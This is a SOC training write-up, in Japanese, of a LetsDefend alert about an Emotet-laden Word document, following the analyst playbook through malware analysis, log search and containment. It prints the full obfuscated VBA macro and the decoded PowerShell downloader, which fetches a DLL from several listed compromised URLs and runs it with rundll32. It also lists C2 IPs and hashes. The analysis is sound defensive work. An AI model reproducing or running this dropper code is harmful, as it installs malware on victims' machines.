LetsDefend level 1 alert SOC109 - Emotet Malware Detected event-id 39
- Details
- playbook
- End
Details
EventID: 39
Event Time: Jan. 1, 2021, 4:45 p.m.
Rule: SOC109 - Emotet Malware Detected
Level: Security Analyst
Source Address 172.16.17.83
Source Hostname Maxim
File Name MES 2020_12_31 S632974.doc
File Hash eee99e6d8ade9463dd206dfbad3485ea
File Size 161.36 Kb
Device Action Allowed
Download (Password:infected): eee99e6d8ade9463dd206dfbad3485ea.zip
playbook
Define Threat Indicator
Answer:Other
Check if the malware is quarantined/cleaned
Device Action Allowed
Answer: Not Quarantined
Analyze Malware
eee99e6d8ade9463dd206dfbad3485ea
VirusTotal 47/62: https://www.virustotal.com/gui/file/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c
Hybrid Analysis: https://www.hybrid-analysis.com/sample/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c/5fefe8368593b70319655413
ANYRUN: https://app.any.run/tasks/5621decd-153d-4982-92c6-e7bddeafde2e/
VirusTotalを見ると多くのベンダーで登録されている既知のマルウェアのようだ。
vbaマクロを実行し、リモートのサーバからファイルを取得している。
このファイルをoletoolsのolevbaで見てみると、
Private Sub Document_open()
Rscxe50kzk0uy8c57h
End Sub
---
Function Rscxe50kzk0uy8c57h()
On Error Resume Next
mKbjhqs = Yfz878jqfi8emxj8k.StoryRanges.Item(4 / 4)
GoTo GgbBEBHp
Dim agRmIUza As Object
Set agRmIUza = CreateObject("Scripting.FileSystemObject")
Dim GgbBEBHp As Object
Set GgbBEBHp = agRmIUza.CreateTextFile("K:\hHLZv\tivKHBG.fyEWE")
GgbBEBHp.WriteLine " "
GgbBEBHp.Close
Set agRmIUza = Nothing
Set GgbBEBHp = Nothing
GgbBEBHp:
snahbsd = "]e1r[Sp]e1r[S"
Lq83qqs1pfyjio1yve = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S"
GoTo XgvEJCBN
Dim QziRLaIvB As Object
Set QziRLaIvB = CreateObject("Scripting.FileSystemObject")
Dim XgvEJCBN As Object
Set XgvEJCBN = QziRLaIvB.CreateTextFile("K:\ngiHBhtC\UfeKFo.VughFHEh")
XgvEJCBN.WriteLine " "
XgvEJCBN.Close
Set QziRLaIvB = Nothing
Set XgvEJCBN = Nothing
XgvEJCBN:
U5loi1_jmnzaqiegq = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S"
GoTo hgtMNEDC
Dim CZSeKtG As Object
Set CZSeKtG = CreateObject("Scripting.FileSystemObject")
Dim hgtMNEDC As Object
Set hgtMNEDC = CZSeKtG.CreateTextFile("K:\cpFBJFDH\xlJbHCC.QYTeJIEGD")
hgtMNEDC.WriteLine " "
hgtMNEDC.Close
Set CZSeKtG = Nothing
Set hgtMNEDC = Nothing
hgtMNEDC:
H_7tattyau5usczkpn = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S"
GoTo KiKEBuJUJ
Dim PTQDJLrW As Object
Set PTQDJLrW = CreateObject("Scripting.FileSystemObject")
Dim KiKEBuJUJ As Object
Set KiKEBuJUJ = PTQDJLrW.CreateTextFile("K:\soeBQFQDw\WMRIMPG.JKyoFAF")
KiKEBuJUJ.WriteLine " "
KiKEBuJUJ.Close
Set PTQDJLrW = Nothing
Set KiKEBuJUJ = Nothing
KiKEBuJUJ:
B0r8pge9ex02he = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S"
GoTo VvbAPGB
Dim wHaMWCAF As Object
Set wHaMWCAF = CreateObject("Scripting.FileSystemObject")
Dim VvbAPGB As Object
Set VvbAPGB = wHaMWCAF.CreateTextFile("K:\bzWJHl\KFaka.azsvpH")
VvbAPGB.WriteLine " "
VvbAPGB.Close
Set wHaMWCAF = Nothing
Set VvbAPGB = Nothing
VvbAPGB:
Opoqhvp43yj = H_7tattyau5usczkpn + B0r8pge9ex02he + U5loi1_jmnzaqiegq + snahbsd + Lq83qqs1pfyjio1yve
GoTo eNfOI
Dim EatwI As Object
Set EatwI = CreateObject("Scripting.FileSystemObject")
Dim eNfOI As Object
Set eNfOI = EatwI.CreateTextFile("K:\rThUJp\jvUYFCcC.bwpqgxnl")
eNfOI.WriteLine " "
eNfOI.Close
Set EatwI = Nothing
Set eNfOI = Nothing
eNfOI:
Z13pi8fctd_bd7 = H_f1l3q4wuv(Opoqhvp43yj)
GoTo mttHC
Dim ZUSgTSS As Object
Set ZUSgTSS = CreateObject("Scripting.FileSystemObject")
Dim mttHC As Object
Set mttHC = ZUSgTSS.CreateTextFile("K:\tRMsNA\ZxNIJGBC.emQhvJFE")
mttHC.WriteLine " "
mttHC.Close
Set ZUSgTSS = Nothing
Set mttHC = Nothing
mttHC:
Set M3zy0l7te6wcqq4_r = CreateObject(Z13pi8fctd_bd7)
GoTo XCtMEEHQH
Dim JEnFGGAH As Object
Set JEnFGGAH = CreateObject("Scripting.FileSystemObject")
Dim XCtMEEHQH As Object
Set XCtMEEHQH = JEnFGGAH.CreateTextFile("K:\KUvdSiCG\SWvOUGCM.yuplAASB")
XCtMEEHQH.WriteLine " "
XCtMEEHQH.Close
Set JEnFGGAH = Nothing
Set XCtMEEHQH = Nothing
XCtMEEHQH:
Px4akgkluolo7in096 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs))
GoTo pHBuBEG
Dim gSXBEs As Object
Set gSXBEs = CreateObject("Scripting.FileSystemObject")
Dim pHBuBEG As Object
Set pHBuBEG = gSXBEs.CreateTextFile("K:\TskVJVn\aafpAJrAE.vUXKLFw")
pHBuBEG.WriteLine " "
pHBuBEG.Close
Set gSXBEs = Nothing
Set pHBuBEG = Nothing
pHBuBEG:
GoTo cxLTHBCC
Dim aNVjIUF As Object
Set aNVjIUF = CreateObject("Scripting.FileSystemObject")
Dim cxLTHBCC As Object
Set cxLTHBCC = aNVjIUF.CreateTextFile("K:\WJmHGBxDH\atxzHEHY.mWWMoDHPG")
cxLTHBCC.WriteLine " "
cxLTHBCC.Close
Set aNVjIUF = Nothing
Set cxLTHBCC = Nothing
cxLTHBCC:
M3zy0l7te6wcqq4_r.Create H_f1l3q4wuv(Px4akgkluolo7in096), Rzvbvgf_vxrf, I3hfd4821r3zv
GoTo pyPIA
Dim qhLiwn As Object
Set qhLiwn = CreateObject("Scripting.FileSystemObject")
Dim pyPIA As Object
Set pyPIA = qhLiwn.CreateTextFile("K:\GGDxTNF\IePRJDt.eCBBOz")
pyPIA.WriteLine " "
pyPIA.Close
Set qhLiwn = Nothing
Set pyPIA = Nothing
pyPIA:
GoTo YiaTHFMA
Dim LPMlGRFHC As Object
Set LPMlGRFHC = CreateObject("Scripting.FileSystemObject")
Dim YiaTHFMA As Object
Set YiaTHFMA = LPMlGRFHC.CreateTextFile("K:\fFLaGYBH\ZvDXsFT.IXtjnt")
YiaTHFMA.WriteLine " "
YiaTHFMA.Close
Set LPMlGRFHC = Nothing
Set YiaTHFMA = Nothing
YiaTHFMA:
End Function
Function H_f1l3q4wuv(H11p8eic2w3zn_)
On Error Resume Next
GoTo jkZdJG
Dim mfixAuM As Object
Set mfixAuM = CreateObject("Scripting.FileSystemObject")
Dim jkZdJG As Object
Set jkZdJG = mfixAuM.CreateTextFile("K:\bVbhWbGD\jTqgJ.GHrZkJCF")
jkZdJG.WriteLine " "
jkZdJG.Close
Set mfixAuM = Nothing
Set jkZdJG = Nothing
jkZdJG:
Bfizqcunyu0 = (H11p8eic2w3zn_)
GoTo SeNkICAJ
Dim HRDLEVmi As Object
Set HRDLEVmi = CreateObject("Scripting.FileSystemObject")
Dim SeNkICAJ As Object
Set SeNkICAJ = HRDLEVmi.CreateTextFile("K:\AkYbFA\BnmqHkXA.oujVB")
SeNkICAJ.WriteLine " "
SeNkICAJ.Close
Set HRDLEVmi = Nothing
Set SeNkICAJ = Nothing
SeNkICAJ:
P_eiv2i047gos2b = Zh7kypwwff0md33a(Bfizqcunyu0)
GoTo ZyJBNBD
Dim kIuKr As Object
Set kIuKr = CreateObject("Scripting.FileSystemObject")
Dim ZyJBNBD As Object
Set ZyJBNBD = kIuKr.CreateTextFile("K:\inSuIwND\usjkXC.fwloXI")
ZyJBNBD.WriteLine " "
ZyJBNBD.Close
Set kIuKr = Nothing
Set ZyJBNBD = Nothing
ZyJBNBD:
H_f1l3q4wuv = P_eiv2i047gos2b
GoTo qoPKJgV
Dim naVxBFJAJ As Object
Set naVxBFJAJ = CreateObject("Scripting.FileSystemObject")
Dim qoPKJgV As Object
Set qoPKJgV = naVxBFJAJ.CreateTextFile("K:\JhzlFCAB\Jfiuz.aptrJGAA")
qoPKJgV.WriteLine " "
qoPKJgV.Close
Set naVxBFJAJ = Nothing
Set qoPKJgV = Nothing
qoPKJgV:
End Function
Function Zh7kypwwff0md33a(L34u2dzesgzcfaiwy)
Zlnor_53jwsrz = Ziq909ju8euif9uz
GoTo HQnFde
Dim aNITDI As Object
Set aNITDI = CreateObject("Scripting.FileSystemObject")
Dim HQnFde As Object
Set HQnFde = aNITDI.CreateTextFile("K:\RMIpGDjgI\TjPglA.JFIpEFW")
HQnFde.WriteLine " "
HQnFde.Close
Set aNITDI = Nothing
Set HQnFde = Nothing
HQnFde:
Zh7kypwwff0md33a = Replace(L34u2dzesgzcfaiwy, "]e1r[S", Rnclsjpi29gic5)
GoTo UMVjHQHCH
Dim gscDYEBhG As Object
Set gscDYEBhG = CreateObject("Scripting.FileSystemObject")
Dim UMVjHQHCH As Object
Set UMVjHQHCH = gscDYEBhG.CreateTextFile("K:\yJFQHkpC\FiUeelAjF.QixxE")
UMVjHQHCH.WriteLine " "
UMVjHQHCH.Close
Set gscDYEBhG = Nothing
Set UMVjHQHCH = Nothing
UMVjHQHCH:
End Function
おそらくこのvbaは次のコマンドを実行している。
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBFAFQALQBpAHQARQBtACAAIAAoACcAdgAnACsAJwBBAHIASQBhACcAKwAnAGIAJwArACcATABFADoAdABJAFMAOAAnACsAJwBDAHEAJwApACAAIAAoAFsAdAB5AFAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAcwAnACwAJwAuAEQASQBSACcALAAnAEUAQwBUAE8AUgB5ACcALAAnAHkAUwB0AGUAbQAnACwAJwBJAE8AJwAsACcALgAnACkAIAAgACkAIAAgADsAIAAgACAAUwBFAHQALQBpAHQAZQBtACAAVgBBAFIAaQBhAEIAbABlADoAOAA1AFkAIAAoAFsAVABZAFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADIAfQB7ADgAfQB7ADEAfQB7ADAAfQB7ADQAfQB7ADkAfQB7ADcAfQB7ADYAfQAiACAALQBGACAAJwByACcALAAnAC4AUwBlACcALAAnAE0ALgAnACwAJwBUAEUAJwAsACcAVgBJAEMAZQBQAE8AJwAsACcAcwB5AFMAJwAsACcAYQBOAGEARwBlAHIAJwAsACcAVABNACcALAAnAE4AZQBUACcALAAnAEkAbgAnACkAKQAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwArACcAdABsACcAKQArACcAeQBDACcAKwAoACcAbwBuAHQAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQARwBtAGwAdABoAHAANwA9ACQAQgA3ADYAQwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUAA0ADYAWAA7ACQAVAAzADcAWQA9ACgAKAAnAEQAJwArACcAMwA1ACcAKQArACcASQAnACkAOwAgACAAJABUAEkAcwA4AEMAcQA6ADoAIgBDAHIARQBgAEEAdABgAEUAZABJAHIAZQBjAGAAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcARwA2ACcAKwAnAFQAJwArACcARgAyAHMAJwApACsAKAAnADIAawAnACsAJwAzAG0AJwApACsAKAAnAEcANgBUACcAKwAnAEoAdwAnACkAKwAnAHcAOQAnACsAJwB3AF8AJwArACcAYgBHACcAKwAnADYAVAAnACkAIAAtAHIARQBQAGwAYQBjAGUAKABbAEMAaABhAFIAXQA3ADEAKwBbAEMAaABhAFIAXQA1ADQAKwBbAEMAaABhAFIAXQA4ADQAKQAsAFsAQwBoAGEAUgBdADkAMgApACkAOwAkAFUAMAA0AFoAPQAoACcARgAnACsAKAAnADUANwAnACsAJwBVACcAKQApADsAIAAoACAAdgBBAFIAaQBBAGIATABlACAAIAA4ADUAeQAgACAALQBWAGEAbAB1AGUATwApADoAOgAiAHMAZQBDAFUAcgBgAGkAYABUAFkAcABSAE8AdABPAGAAYwBPAGwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEoAMwA0AE8APQAoACcAUQAwACcAKwAnADkAQQAnACkAOwAkAFQANAB3ADMAZwBvAHUAIAA9ACAAKAAnAEwAJwArACgAJwBfACcAKwAnADAARQAnACkAKQA7ACQARAAwADUAUQA9ACgAJwBUADIAJwArACcAOABMACcAKQA7ACQATwBkAHcAdQBtAGsAeAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEYAMgBzACcAKwAoACcAMgAnACsAJwBrADMAJwApACsAJwBtAHsAMAB9AEoAdwB3ACcAKwAoACcAOQB3ACcAKwAnAF8AYgAnACkAKwAnAHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAGMASABBAFIAXQA5ADIAKQArACQAVAA0AHcAMwBnAG8AdQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAEUAMwA3AFEAPQAoACgAJwBFACcAKwAnADkAOAAnACkAKwAnAEgAJwApADsAJABBAHoAZwBsADgAMgBuAD0AKAAoACcAXQBlADEAJwArACcAcgAnACkAKwAoACcAWwAnACsAJwBTADoALwAvACcAKQArACcAZABlACcAKwAnAGMAJwArACgAJwBwACcAKwAnAGEAawAuAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAaQBuAC8AZwBVACcAKwAnAC8AQABdACcAKQArACgAJwBlACcAKwAnADEAcgAnACkAKwAnAFsAUwAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAGEAJwArACcAbgAnACkAKwAoACcAZwBlAGwAJwArACcAcwBsACcAKQArACgAJwBsAGkAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwByACcAKwAnAGcAYQBzAC4AYwBvAG0ALwBBACcAKwAnAFUARAAnACkAKwAoACcASQAnACsAJwBPAC8AMwBkACcAKQArACgAJwB3AG0ALwBAACcAKwAnAF0AJwArACcAZQAxACcAKwAnAHIAWwAnACkAKwAoACcAUwAnACsAJwA6AC8ALwBnACcAKQArACgAJwBhAGQAJwArACcAZwAnACkAKwAnAGUAJwArACgAJwB0AGIAJwArACcAYQB5AC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACcALwBsACcAKwAoACcAZQB0AHMAZAAnACsAJwBlACcAKwAnAGEAbAAvAGcAJwArACcAZABGAGoAZgBRAC8AQAAnACkAKwAoACcAXQAnACsAJwBlADEAJwApACsAKAAnAHIAWwBTACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvAGMAcwAnACsAJwBnAGMAYQByAGcAJwArACcAbwAnACsAJwAuAGMAbwBtAC8AYwBvAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBHAGIALwAnACsAJwBAACcAKwAnAF0AZQAxAHIAJwApACsAJwBbACcAKwAoACcAUwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACgAJwBhACcAKwAnAGcAegB6ACcAKQArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AJwArACcAdABlACcAKQArACcAbgB0ACcAKwAnAC8ASwAnACsAKAAnAFAAJwArACcALwBAACcAKQArACgAJwBdAGUAJwArACcAMQByAFsAUwBzACcAKwAnADoAJwApACsAKAAnAC8ALwBtAGUAdABhACcAKwAnAGQAJwApACsAJwBvAHIAJwArACgAJwByACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAQQBMAEYAQQAnACkAKwAnAF8AJwArACgAJwBEAEEAJwArACcAVABBAC8AJwApACsAJwBCAHQAJwArACgAJwBmAE0AJwArACcAOAAnACkAKwAoACcASQAnACsAJwBkAC8AQABdAGUAMQAnACsAJwByAFsAJwArACcAUwAnACsAJwBzADoALwAvAHMAJwApACsAJwBlACcAKwAnAG4AJwArACgAJwB0AHUAcgBrACcAKwAnAGUAJwApACsAKAAnAHQAaQAnACsAJwBjAGEAcgBlAHQALgBjAG8AJwArACcAbQAvACcAKwAnAHcAcAAnACsAJwAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwB5AE8AJwArACcAbAAvACcAKQApAC4AIgBSAGUAcABgAEwAYABBAGMAZQAiACgAKAAnAF0AJwArACcAZQAxACcAKwAoACcAcgBbACcAKwAnAFMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAHAAbABgAGkAdAAiACgAJABNADAAMQBMACAAKwAgACQARwBtAGwAdABoAHAANwAgACsAIAAkAEcANQA1AFMAKQA7ACQAVQAxADIAWQA9ACgAJwBJAF8AJwArACcAMABJACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAGMAXwB0ADYAcgAgAGkAbgAgACQAQQB6AGcAbAA4ADIAbgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAcwB5AFMAVABlAG0ALgBOAGUAdAAuAFcARQBiAGMAbABpAGUATgB0ACkALgAiAEQAbwBgAFcATgBMAE8AYQBkAGYASQBgAEwAZQAiACgAJABYAHIAYwBfAHQANgByACwAIAAkAE8AZAB3AHUAbQBrAHgAKQA7ACQARQA3ADAAUAA9ACgAJwBKACcAKwAoACcANAAyACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQATwBkAHcAdQBtAGsAeAApAC4AIgBMAGUATgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQAxADYAMwApACAAewAmACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABPAGQAdwB1AG0AawB4ACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAXwBSAHUAJwApACsAJwBuACcAKwAoACcARABMACcAKwAnAEwAJwApACkALgAiAHQATwBgAHMAVABgAFIASQBOAEcAIgAoACkAOwAkAEcANgA1AE8APQAoACgAJwBXAF8AJwArACcANAAnACkAKwAnAEYAJwApADsAYgByAGUAYQBrADsAJABUAF8ANABGAD0AKAAnAEQANwAnACsAJwA0AFAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABWADUANQBPAD0AKAAnAEEAJwArACgAJwA1ACcAKwAnADIAWgAnACkAKQA=
実行しているpowershellのコマンドは、
SET-itEm ('v'+'ArIa'+'b'+'LE:tIS8'+'Cq') ([tyPE]("{0}{3}{5}{4}{1}{2}" -f's','.DIR','ECTORy','yStem','IO','.') ) ; SEt-item VARiaBle:85Y ([TYPE]("{5}{3}{2}{8}{1}{0}{4}{9}{7}{6}" -F 'r','.Se','M.','TE','VICePO','syS','aNaGer','TM','NeT','In')) ;$ErrorActionPreference = (('S'+'ilen'+'tl')+'yC'+('ontin'+'u')+'e');$Gmlthp7=$B76C + [char](64) + $P46X;$T37Y=(('D'+'35')+'I'); $TIs8Cq::"CrE`At`EdIrec`TOrY"($HOME + ((('G6'+'T'+'F2s')+('2k'+'3m')+('G6T'+'Jw')+'w9'+'w_'+'bG'+'6T') -rEPlace([ChaR]71+[ChaR]54+[ChaR]84),[ChaR]92));$U04Z=('F'+('57'+'U')); ( vARiAbLe 85y -ValueO)::"seCUr`i`TYpROtO`cOl" = ('Tl'+('s1'+'2'));$J34O=('Q0'+'9A');$T4w3gou = ('L'+('_'+'0E'));$D05Q=('T2'+'8L');$Odwumkx=$HOME+(('{0}F2s'+('2'+'k3')+'m{0}Jww'+('9w'+'_b')+'{0'+'}') -F[cHAR]92)+$T4w3gou+(('.d'+'l')+'l');$E37Q=(('E'+'98')+'H');$Azgl82n=((']e1'+'r')+('['+'S://')+'de'+'c'+('p'+'ak.c')+'o'+('m'+'/cg')+('i'+'-bin/gU'+'/@]')+('e'+'1r')+'[S'+':'+'/'+('/a'+'n')+('gel'+'sl')+('li'+'m')+('a'+'r'+'gas.com/A'+'UD')+('I'+'O/3d')+('wm/@'+']'+'e1'+'r[')+('S'+'://g')+('ad'+'g')+'e'+('tb'+'ay.')+('co'+'m')+'/l'+('etsd'+'e'+'al/g'+'dFjfQ/@')+(']'+'e1')+('r[S'+'s')+(':'+'//cs'+'gcarg'+'o'+'.com/conte'+'nt')+('/Gb/'+'@'+']e1r')+'['+('S:/'+'/')+'a'+('a'+'gzz')+'.c'+'o'+('m/wp'+'-con'+'te')+'nt'+'/K'+('P'+'/@')+(']e'+'1r[Ss'+':')+('//meta'+'d')+'or'+('r'+'.c')+('om/'+'ALFA')+'_'+('DA'+'TA/')+'Bt'+('fM'+'8')+('I'+'d/@]e1'+'r['+'S'+'s://s')+'e'+'n'+('turk'+'e')+('ti'+'caret.co'+'m/'+'wp'+'-ad')+('min'+'/yO'+'l/'))."Rep`L`Ace"((']'+'e1'+('r['+'S')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."Spl`it"($M01L + $Gmlthp7 + $G55S);$U12Y=('I_'+'0I');foreach ($Xrc_t6r in $Azgl82n){try{(&('New-O'+'b'+'ject') sySTem.Net.WEbclieNt)."Do`WNLOadfI`Le"($Xrc_t6r, $Odwumkx);$E70P=('J'+('42'+'C'));If ((.('Get-'+'Ite'+'m') $Odwumkx)."LeNg`TH" -ge 39163) {&('rund'+'l'+'l32') $Odwumkx,('C'+('on'+'t')+('ro'+'l_Ru')+'n'+('DL'+'L'))."tO`sT`RING"();$G65O=(('W_'+'4')+'F');break;$T_4F=('D7'+'4P')}}catch{}}$V55O=('A'+('5'+'2Z'))
このスクリプトは、以下のURLから何かを取得しようとしている。
http://decpak.com/cgi-bin/gU/ http://angelsllimargas.com/AUDIO/3dwm/ http://gadgetbay.com/letsdeal/gdFjfQ/ https://csgcargo.com/content/Gb/ http://aagzz.com/wp-content/KP/ https://metadorr.com/ALFA_DATA/BtfM8Id/ https://senturketicaret.com/wp-admin/yOl/
このURLを調べると例えば、
http[:]//decpak.com/cgi-bin/gU/
URLhaus: https://urlhaus.abuse.ch/url/945783/
Emotet!!!
Answer: Malicious
Check If Someone Requested the C2
Log search - 172.16.17.83
172.16.17.83からのアクセスを見る。
| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 330 | Jan, 01, 2021, 04:41 PM | Proxy | 172.16.17.83 | 14441 | 23.111.174.153 | 80 |
| 331 | Jan, 01, 2021, 04:42 PM | Proxy | 172.16.17.83 | 15431 | 152.170.79.100 | 80 |
| 332 | Jan, 01, 2021, 04:43 PM | Proxy | 172.16.17.83 | 23121 | 190.247.139.101 | 80 |
330
URL: http://decpak.com/cgi-bin/gU/ Request Method: GET
331
URL: http://152.170.79.100/076ay2uof/umojx2x1vf1qjjk/hue4e670x/d3eobn8z0k0rp/syaxabx0loj/erz7hayf/ Request Method: GET
332
URL: http://190.247.139.101/i3u3l3e3n96/sow63klj/pkv3runqw/dudwqjl4zg8l7hk6ah6/huulsuajy/nibyefksabf1mz63/ Request Method: GET
先ほど挙げたemotetに関連するサーバへのアクセスを確認した。
また、152.170.79.100と190.247.139.101に関してはVirusTotalで見ると、
152.170.79.100: https://www.virustotal.com/gui/ip-address/152.170.79.100/community
190.247.139.101: https://www.virustotal.com/gui/ip-address/190.247.139.101/community
Emotetと関連するというレポートがある。
Answer: Accessed
Containment
Endpoint - Maxim 172.16.17.83
CMD History
01.01.2021 10:21: ipconfig 01.01.2021 10:22: netsh interface ipv4 show config 01.01.2021 10:23: arp -a
emotetによるネットワークの情報収集か。
Network Connections
01.01.2021 16:21: 172.217.169.174 01.01.2021 16:22: 172.217.169.174 01.01.2021 16:23: 172.217.169.174 01.01.2021 16:42: 152.170.79.100 01.01.2021 16:43: 190.247.139.101
172.217.169.174は問題無さそう。
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| f2d0c66b801244c059f636d08a474079 | MD5 Hash | malicious word file |
| https[:]//filetransfer[.]io/data-package/UR2whuBv/download | URL Address | file sending service |
End
近年のmalwareは、やはりemotetが流行りか。ANYRUNへの2021年のアップロードは、njRATが多かったようだが実際のマルウェア感染の件数や被害としてはemotetが多いイメージがある。
